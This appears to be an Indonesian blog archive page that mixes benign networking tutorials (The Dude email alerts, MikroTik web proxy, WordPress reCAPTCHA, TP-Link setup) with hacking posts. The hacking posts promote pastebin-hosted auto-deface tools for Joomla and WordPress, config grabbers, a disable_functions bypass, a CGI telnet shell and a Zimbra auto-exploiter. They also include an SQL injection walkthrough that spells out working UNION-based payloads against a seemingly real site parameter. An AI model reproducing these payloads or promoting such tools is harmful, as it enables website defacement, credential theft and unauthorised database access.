Jumat, 01 Januari 2016

Simple Tools For Deface


kali ini ane ingin share gabungan dari tools ane.
tinggal klik - klik doang.

Tools:

  1. Jumping (Cuma liat Dir yg readable)
  2. Config grabber Wordpress dan Joomla.
  3. Auto deface site cms joomla. (jadi setelah dapat config yang joomla, mungkin bisa gunain tool ini, dan liat nama domainnya di fitur yang Jumping).
  4. Auto deface site cms Wordpress (sama kayak yang Joomla diatas, tapi ini tidak perlu masukin nama sitenya.)
  5. Auto deface site cms Wordpress 2. (mirip sama yang pertama, tapi ini cuma masukin link confignya aja, jadi setelah pakai Fitur Config, dan dapat Config yang Wordpress. tinggal ditaro aja linknya di form).
  6. Bypass Disabled Functions.
  7. CGI Telnet.


ambil scriptnya disini.
http://pastebin.com/BY5SZjm6

mungkin bisa ditambahin lagi fitur - fiturnya.
keep share.

#.


Read more

Selasa, 29 Desember 2015

Cara Membuat Notifikasi Email The Dude (Aplikasi Monitoring Jaringan)

Sebagai seorang Network Admin, sudah pasti kita menginginkan kondisi jaringan yang sehat dan handal tanpa adanya gangguan perangkat atau jaringan. Namun kenyataan nya gangguan tetap saja ada. Untuk mempermudah kita dalam mengetahui perangkat atau link mana yang mengalami gangguan, tentunya kita butuh Aplikasi Monitoring Jaringan yang dapat memberitahukan kita jika ada gangguan.

Ada banyak sekali Aplikasi Monitoring Jaringan Gratis yang bisa kita manfaatkan. Salah satu yang menurut saya cukup bagus dengan fitur yang lumayan lengkap dan yang pastinya GRATIS yaitu The Dude.

The Dude adalah aplikasi buatan Mikrotik yang berfungsi untuk memonitor jaringan komputer dengan simple dan mudah. Saya sudah pernah bahas tentang The Dude, silakan baca disini :

Oke. Yang akan kita bahas pada artikel kali ini adalah Cara Membuat Notifikasi Email di The Dude, sehingga ketika ada perubahan status perangkat karena gangguan kita akan dapat pemberitahuan melalui email.

Kenapa email? kok gak pakai SMS aja sih? Yups pertanyaan yang bagus, pakai SMS juga bisa, tapi kita coba dulu bertahap via Email ya. Karena kalo pakai email bisa gratis, jadi seberapa pun banyaknya perangkat yang ingin kita monitor tidak jadi masalah. Lain halnya jika kita pakai SMS, tentu bakalan nyedot pulsa banyak kan.

Sebelum kita mulai, ada beberapa hal yang kita perlukan :
  1. Aplikasi The Dude. Saya sarankan install versi terbaru dari The Dude disini. Atau bisa Download versi 4.0beta3 disini.
  2. Akun email Gmail (Untuk kirim email notifikasi). Saya sarankan gunakan email yang tidak terpakai.
  3. Aplikasi Mailsend. Download disini.
Oke, langsung kita mulai saja Tutorial Cara Membuat Notifikasi Email dengan The Dude:

1. Install The Dude. Langkah-langkah install hingga membuat Network Map ada disini.



2. Buka folder instalasi The Dude  -->
Untuk Windows 64 bit C:\Program Files (x86)\Dude\
Untuk Windows 32 bit C:\Program Files\Dude\
Buat Folder Baru beri nama mailsend --> Copy file mailsend.exe ke folder tersebut.


3. Buat file mailsend.cmd --> Caranya buka notepad masukkan script berikut :
::
:: Kirim Notifikasi Email The Dude via Gmail
::
set mailsenderdir=C:\Program Files (x86)\Dude\mailsend
set mailsender=mailsend.exe
set smtpsender=username@gmail.com
set smtpsenderfullname=username
set smtpserver=smtp.gmail.com
set smtpport=465
set smtpuser=username@gmail.com
set smtppwd=password
set mailto=username@gmail.com
::
::
"%mailsenderdir%\%mailsender%" -smtp %smtpserver% -port %smtpport% -ssl -auth -user %smtpuser% -pass %smtppwd% -t %mailto% -f %smtpsender% -name "%smtpsenderfullname%" +cc +bc -q -sub %1 -M %2
::
::pause
::

Silakan edit script tersebut pada bagian yang berwarna. Kemudian save dengan nama mailsend.cmd di folder yang sama dengan mailsend.exe.

4. Buka Aplikasi The Dude --> Masuk ke menu Notifications --> Tambahkan Notifikasi Baru --> Beri nama dan pilih tipe nya execute on server. Ganti Command nya dengan script berikut :
"C:\Program Files (x86)\Dude\mailsend\mailsend.cmd" "Service [Probe.Name] on [Device.Name] is now [Service.Status]" "Service [Probe.Name] on [Device.Name] is now [Service.Status] ([Service.ProblemDescription])"
Silakan sesuaikan path direktori pada bagian yang berwarna kuning.


5. Coba test setingan nya, Klik Test.

6. Jika setingan benar, maka akan muncul jendela CMD untuk mengirim email otomatis.



7. Silakan buka email anda untuk mengecek apakah email test tadi berhasil dikirim.



8. Sekarang kembali ke The Dude, Masuk ke Network Map. Klik menu Settings --> Tab Polling --> Centang opsi Use Notifications --> Centang Notifikasi Kirim Email --> Ok



9. Sampai disini setingan sudah selesai. Silakan coba down/up kan device yang ada di network map untuk mengetes hasil nya.

10. Cek Email untuk melihat hasil Notifikasi nya


Oke Selesai sudah. Hal yang perlu diingat adalah The Dude tidak bisa mengirim notifikasi email jika tidak ada koneksi Internet. Jadi pastikan Server The Dude terkoneksi ke internet. Untuk membuat notifikasi via SMS silakan baca Tutorial Mikrotik berikut ini :
Cara Membuat Notifikasi SMS The Dude

Silakan dicoba dan semoga berhasil :)
Read more

Jumat, 18 Desember 2015

Auto Exploiter zimbra PHP


kali ini ane pengen share Auto Exploiter zimbra versi php.

yang asli ada disini:
https://www.exploit-db.com/exploits/30085/



tinggal dikembangin aja ini tool..
sengaja ane share yg masukin target 1 per 1,
supaya ada usahanya dikit..

video:
https://www.youtube.com/watch?v=agfMShXSD5g

script:
http://pastebin.com/n1VnxGzE



#
Read more

Selasa, 15 Desember 2015

Web Proxy MikroTik

Topik-topik yang akan kita bahas:
1. Apakah anda melilih RB atau PC MikroTik untuk anda jadikan sebagai Web Proxy Server?
2. Penjelasan Web Proxy di MikroTik?
3. Cara Konfigurasi Web Proxy Transparent di MikroTik?


Apakah anda melilih RB atau PC MikroTik untuk anda jadikan sebagai Web Proxy Server?
Sebelum kita belajar tentang Web Proxy di RouterOS MikroTik atau di Routerboard MikroTik. Untuk itu saya jelaskan terlebih dahulu perbedaanya apakah anda memilih RB atau PC MikroTik untuk anda gunakan sebagai Web Proxy. Cekidot~

Router OS MikroTik maupun RB MikroTik itu sama-sama dapat digunakan Web Proxy ya, yang penting package system di MikroTik sudah terinstal. Jika anda melakukan implementasi Proxy menggunakan platform ini saya sarankan untuk di instal/ditaruh di PC yang dalam-nya diinstal OS MikroTik. Tergantung device RB MikroTik anda dan apakah anda juga punya PC yang nantinya diinstal RouterOS MikroTik. Dan untuk menjalankanya pada Routerboard saya rekomendasikan anda menggunakan RB MikroTik yang sudah kelas Enterprise atau series 1000 yang hardware-nya mendukung untuk digunakan sebagai Web Proxy didalamnya. Kalau device MikroTik anda masih series 100-700, saya harap anda persiapkan PC saja yang nanti untuk Proxy-nya, karena apa? kalau series 100-700 rata-rata kalau digunakan untuk Web Proxy itu lama-lama akan memberatkan processor, RAM RB, apalagi RB 100-700 itu kan spesifikasi hardware-nya rendah. Tetapi kalau untuk pendidikan atau hanya untuk simulasi sementara, pakai RB tersebut sudah cukup.
Proxy itu tidak hanya menggunakan platform MikroTik ya? Banyak distro-distro linux yang bisa digunakan untuk Proxy server dan performa-nya juga bisa lebih baik daripada MikroTik.


Penjelasan Web Proxy di MikroTik
Web Proxy disini merupakan aplikasi didalam MikroTik yang digunakan untuk mengatur proxy didalamnya, proxy ini yang nanti sebagai perantara client dengan server yang berada internet. Jadi gini: 

Cara kerja:
Jika client melakukan browsing (HTTP Request) maka akan melewati proxy terlebih dahulu setelah itu baru diarahkan ke internet server, ketika itu sudah tidak client lagi yang request melainkan web proxy yang melakukan HTTP Request ke server internet, kemudian setelah itu server internet akan merespond (HTTP Respond) kemudian membalas dan meneruskanya lagi ke browser client. Nah, pada saat proses tersebut data yang diakses client akan disimpan didalam web proxy. Kemudian, jika client melakukan koneksi ke server internet yang sama maka koneksi client akan terasa lebih cepat dibanding saat pertama browsing, ini karena data sudah disimpan (cache) didalam web proxy.


Cara  Konfigurasi Web Proxy Transparent di MikroTik
Kata Transparent disini berarti ketika client mengakses internet maka otomatis diarahkan ke web proxy. (setelah web proxy dikonfigurasi dan settingan NAT)
Kebalikanya yaitu Manual Proxy, artinya kita harus setting proxy di laptop kita atau browser yang biasa kita gunakan dengan IP MikroTik dan port yang digunakan oleh web proxy MikroTik terlebih dahulu untuk bisa menggunakan web proxy MikroTik.

Disini saya akan berikan langkah-langkah bagaimana cara konfigurasi Web Proxy Transparent di MikroTik:
PERHATIAN: Silahkan konfigurasi MikroTik anda sampai MikroTik dan Client LAN mendapat akses Internet.
1. Pertama silahkan buka Winbox anda.
2. Setelah itu silahkan pilih menu IP -> Web Proxy
web proxy winbox
3. Pada tahap ini:
#Checklist Enabled
#Port = 3128
#Cache Administrator = [luxsmart@luxsmart.blogspot.com] Isi sesuka anda, direkomendasikan mengikuti aturan format penulisan ...@...
#Checklist Cache On Disk (Jika anda checklist maka data akan ter-cache didalam Web Proxy MikroTik)

Klik Access
#Dst. Host = *wotube.com (situs yang akan diblock). Format penulisanya menggunakan (*situs.com)
#Action = deny (tolak)

Apply - OK
web proxy winbox
Pada tahap selanjutnya, kita akan melakukan transparent proxy menggunakan NAT.

4. Pilih menu IP -> Firewall -> NAT
firewall winbox
5. Pada Tab General:
Chain : dst-nat
Protocol : 80, 81
firewall winbox
6. Padat Tab Action
Action : redirect
To Port : 3128
Apply - OK
firewall winbox
Pengujian, silahkan client test koneksi ke situs yang diblock diatas nanti otomatis akan keblock oleh web proxy MikroTik.

Tag:
Caching Web Proxy MikroTik
Transparent Web Proxy MikroTik
Pengertian Web Proxy MikroTik







Read more

Jumat, 11 Desember 2015

Cara Pasang reCAPTCHA Google Versi 2 di Login, Register Member dan Form Komentar Pada Wordpress

Selamat datang di Blog yang sederhana ini gan, semoga anda tidak bosan-bosan membaca artikel-artikel seputar Teknologi Informasi di blog ini. Mungkin artikel yang satu ini sudah banyak yang posting tapi niat saya hanya untuk berbagi kepada saudara-saudara sekalian sekaligus untuk menambah postingan saya pribadi. Semoga membantu bagi anda yang masih pemula menggunakan CMS Wordpress.  Mungkin jika anda tidak malas, silahkan baca-baca dulu aja apa itu Captcha

Versi 1:
versi recaptcha 1






Oke, disini tujuan saya untuk membuat tutorial bagaimana cara Si Wordpress ini full service oleh Captcha Google setiap ada form-form pengisian. Jadi gini bos, disini saya developing website, nah karena saya familiar dengan CMS Wordpress maka saya pakai aja Wordpress. Ketika saya ingin men-secure-kan form-form pengisian pada wordpress ini dari spam-spam bot, maka saya gunakan tuh Captcha. Ini juga termasuk security Wordpress lho. Jadi artikel ini ada manfaatnya to? Untuk security wordpress... He he he

Baca selengkapnya manfaat captcha untuk website "Benefit captcha for website" disini.

Saya akan menerapkan Captcha ini nanti pada form-form biasa (menggunakan plugin Contact Form 7 "Free-Plugin") yang sudah ter-integrasi dengan Captcha Google (pada artikel yang lain). Kemudian penerapan yang lain nanti saya akan gunakan atau taruh pada saat login Administrator, login Register member, dan post komentar Wordpress menggunakan plugin Google Captcha (reCAPTCHA) by BestWebSoft . Jadi, ketika user/visitor website ingin mengisi form-form di website maka akan ada tuh si captcha yang minta disuruh meng-klik sebagai syarat untuk langkah selanjutnya. Form login Administrator website juga harus disecurity ya,,, So inilah yang utama . He he... Sebagai pencegahan para hacker programing yang membuat program bot untuk pengisian form secara otomatis kepada website kita dengan skala banyak (flooding). Oke, udah lumayan to? Wordpress kita sudah kita tambah security dari spam-spam bot.

Udah dulu ceritanya, mari kita menuju ke step-by-stepy-nya:
1. Langkah awal yang harus anda lakukan adalah mendaftarkan domain website anda ke reCAPTCHA Google untuk mendapatkan Key dan Secret yang nantiya digunakan untuk mengintegrasikan ke Google reCAPTCHA. 
Silahkan daftar saja disini : Google Recaptcha. Kemudian isi form Register a new site.  
Silahkan isi Label dan Domain sesuai dengan nama domain Website anda. Setelah itu isi Owners dengan Email anda (Aktiv).
daftar recaptcha google
Selanjutnya anda akan mendapatkan Site Key dan Secret Key. Inilah yang nantiya anda gunakan untuk mengintegrasikan webiste anda dengan reCAPTCHA Google pada saat login administrator maupun login register member wordpress.
kode recaptcha goolgle
Okey, standby disitu dulu. Pastikan anda tidak close tab ini atau anda bisa meng-copy Site Key dan Secret key ke file Notepad atau file editor lain.

2. Silahkan install Plugin Google Captcha (reCAPTCHA) by BestWebSoft. Masukan Site key dan Secret key reCAPTCHA Google tadi ke kolom yang sudah disediakan. Setelah itu atur pengaturan lain seperti gambar berikut: 
dashbord wordpress
(NB: Slahkan atur dengan ketentuan anda masing-masin)

3. Pengecekan:

A. Login Administrators
recaptcha on login wordpress
 B. Login Register Member
recaptcha on register member wordpress
C. Komentar
recaptcha on form comment wordpress
Oke sekian dulu... Semoga bermanfaat bagi anda yang masih pemula. 

Sabtu, 12 Desember 2015 at  02:24 AM




Read more

Selasa, 08 Desember 2015

Auto Deface cms Joomla if you get config





Auto Deface cms Joomla if you get config.


yg versi wordpress ada disini
cocok buat yg maenan symlink atau config..
jadi kita tinggal masukin user db, passwd db, dbprefix, dll
ada auto defacenya juga...



tool ini merupakan pengembangan dari yg sebelumnya.
yg ini lebih dinamis dan powerfull..

http://pastebin.com/50NQdet2

video: https://youtu.be/clvLy5pDA2I

#.




Read more

Cara Mudah Setting Radio TP-Link TL-WA701ND Untuk Hotspot

Pada kesempatan kali ini saya akan share bagaimana cara mudah setting Radio TP-Link TL-WA701ND, pada artikel Cara Setting Radio TP-Link TD-W8151N Untuk Hotspot juga sudah saya jelaskan. Nah pada seri ini cuma beda step by step-nya karena apa? Seri-nya aja sudah beda, apalagi tool, menu, tampilan, dll? Pasti langkah dan tingkat kerumitan settingan sudah berbeda. Iya to...?
gambar tl-wa701nd

Langsung ke Topik aja ya~
Sebelum anda melakukan instalasi Radio, lihat-lihat aja dulu informasi yang ada di radio tersebut. Disana pasti ada informasi mengenai IP Address default radio, dsb. Ini hampir semua radio juga memiliki informasi yang sama dan tertera pada fisik radio tersebut. Nah setelah anda lihat-lihat dan tau IP Address default-nya berapa silahkan lakukan instalasi power radio tersebut sesuai dengan rencana anda sendiri. Misal anda akan menggabungkan dengan antena yang anda taruh diatas Tower, pastinya instalasinya sudah berbeda. 

Oke, lanjut ke Teknis~
Radio seri ini IP Address defaultnya adalah: 192.168.0.254
1. Pertama silahkan setting IP Address laptop atau komputer anda satu subnet dengan IP Address default si Radio. Jika IP radio-nya 192.168.0.254 maka anda bisa menggunakan IP 192.168.0.1-192.168.0.253 pada laptop anda. Perhatikan gambar settingan IP Address dibawah ini:
setting ip laptop
2. Masukkan username : admin password: admin (default)
login
3. Pada Quick Setup Next aja.
setting ip laptop
4. Pilih Access Point pada Operation Mode. Disini karena kita akan menggunakan untuk memancarkan Wi-Fi maka menggunakan mode tersebut. Untuk mode yang lain silahkan baca aja deskripsi singkat yang ada disamping tulisan mode tersebut.
setting 2
5. Perhatian:
SSID : AP-Lux-Smart (Nama Wi-Fi yang nantinya muncul pada Wireless laptop anda)
Wireless Security Mode : WPA/WPA2-PSK (Type security)
Wireless Password : lukman (password yang nantiya anda isi setelah meng-connect-kan ke SSID diatas)
setting 3
Jika anda tidak ingin mengisi passwordnya silahkan pilih Wireless Security Mode : No Security
setting 4
6. Perhatian-2:
DHCP Server : Disable (Nanti dapat IP dari router). Disini saya menggunakan sebuah router yang nanti saya hubungkan ke Radio ini, jadi saya non-aktifkan (disabled). Jika saya enable maka client akan mendapat IP yang satu sabnet (beda host) dengan si radio.
IP Address :  192.168.0.254 (IP ini untuk me-remote radio, jika anda mengubah IP Address ini maka anda juga harus mengubah IP laptop anda ketika akan meremote radio)
setting 5
7. Terakhir, ini adalah tahap informasi settingan yang tadi anda buat. Setelah anda benar-benar yakin dengan settingan anda, silahkan Reboot.
finish setting

Semoga membantu anda yang masih belajar...



Read more

Kamis, 03 Desember 2015

SQL Level tricky injection



[SQL injection Level   HIGH]
Assalamu’alaikum wr.wb
Sesuai janji k.minato di group , jika likenya > 50 maka kk akan kasih solusi quernya.. \ :D /
Buat yg udah merasa leet, skip aja tutorial ini yh J (y)


Dalam challenge kali ini.. tasknya adalah
task::
must union based Not Error Based
print your name,table & column..
dari hasil PM teman”  bahkan kk yg leet sekalipun :v  telah terkirim semuanya menggunakan error based.. namun itu tidaklah memenuhi task pada challenge..
BTW seperti apa sih query error based pada chall ini.. oke kita pemanasan dulu gays ..
Buka AdvanceHackbar kalian, lalu tambahkn ‘


Dalam memunculkn query EB .. kita bias menggunakan command awal operator AND,OR,Where, UNION SELECT..
Di web ini perintah yg work adalah menggunakan union select [query error based disini]
Okey kita langsung inject, ketik union select dan masukkn query EB dari  hackbar..
Aaand BOoM ..semudah  itu kan :v

..
Jika kita niatnya **** untuk web ini .. dengan EB aja udah cukup.. tapi wait ini adalah challenge (must union based Not ERROR BASED )
So, bagaimana cara inject dengan Union based ??????
1.       Diketahui dari error yg muncul adalah :
Wrong SQL Statement: SELECT s.* FROM (SELECT @BeritaID:=33\' p) parm , v_komentar_berita s
Mysql Comment:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' p) parm , v_komentar_berita s' at line 1
  SELECT s.* FROM (SELECT @BeritaID:=33\' p)    ß tanda \’ artinya input di parameter ini tidak menerima string, berarti type injectnya adalah integer type


2.       Tahap selanjutnya adalah membalance inputnya, supaya query injection dapat  kita masukan kedalam parameter, disinilah letak challenge di mulai 3:) . Perhatikan error statementnya :
SELECT s.* FROM (SELECT @BeritaID:=33\' p) parm , v_komentar_berita s
Angka 33 adalah nilai parameter dari ini .. ?hal=berita&nid=33  jika kita membalance hanya dengan
?hal=berita&nid=33 +--+
?hal=berita&nid=33 %23
?hal=berita&nid=33 %60
Maka itu tidak akan work sama sekali :P , so perhatikan lagy error spt di gambar .. terdapat query p) parm , v_komentar_berita s   dibelakang parameternya..  maka kita tambahkan query itu di di parameter lalu balancing
?hal=berita&nid=33  p) parm , v_komentar_berita s +--+
Dan page kembali normal seperti sedia kala ;-) , artinya query sql bias kita input


Ketik order by seperti inject biasanya


Diketahui jumlah column = 11 , sekarang saatnya kita union based kan ..
Daannn BoooooooMMM  XD  GAGAL SEMUA  wkwkwkwk anda memasuki inti dari challenge ini XD.
Saya yakin kebanyakan dari Injector akan banyak yg gagal disini.. bahkan beberapa leet ada yg dh give up minta solusi XD .. skrg bagaimanakah solusi untuk Minimal saja menampilkan nilai vuln columnnya ???????
##
Coba perhatikan saat kita suksess membalance nya..
?hal=berita&nid=33  p) parm , v_komentar_berita s +--+
Page yg ditampilkan adalah halaman komentar.. dan disana  belom ada yg berkomentar sama sekali.. maka didatabase nya belum terisi apa apa.. sehingga vuln column tdk tampil .. lalu kenapa kk Sec7or suksess menampilkan vuln columns..???????
##BERIKUT QUERY RAHASIANYA##
Diketahui  v_komentar_berita dan s adalah nama table, lalu ketik dibawaah ini ::
?hal=berita&nid=33 PESAN_KAMI) klw_ad_yg_copas_sertakan_copyright_from_sec7or , v_komentar_berita s UNION/**TUtorial_by_Sec7or**/SELECT s.* FROM (SELECT 31337


Nah perhatikan pada Wrong SQL Statement nya.. kita mendapatkan table baru disana bernama v_berita dan s .. nah tanpa berfikir panjang instinc injec7or langsung menusuk..
?hal=berita&nid=33  p) parm , v_berita s +--+


Joss.. kali ini page kembali normal dengan balancing pada table v_berita  . dan isi yg ditampilkn bukan lagy komentar melainkan isi berita seperti awal.. dan lanjutkan order by 1+--+  seperti biasa untuk nampilin vuln columnnya :D
?hal=berita&nid=33 p) parm , v_berita s where/**tutorial_udah_berakhir_thanks_atas_partisipasinya**/1/**team_sec7or_**/=/**mastering_of_sql_injection**/0 UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+--+

Sekian solusi challenge kali ini..  dan yg terakhir kami ucapkan terima kasih bnyk kepada k.fuad dan k.sanusi .. yg telah bnyk menemukan hal baru di dunia sql injection..
SQL injection sekarang telah berkembang pesat lebih dalam dalam dan lebih dalam,namun kami team se7or.. akan selalu  upgrade sql weapon kami

Read more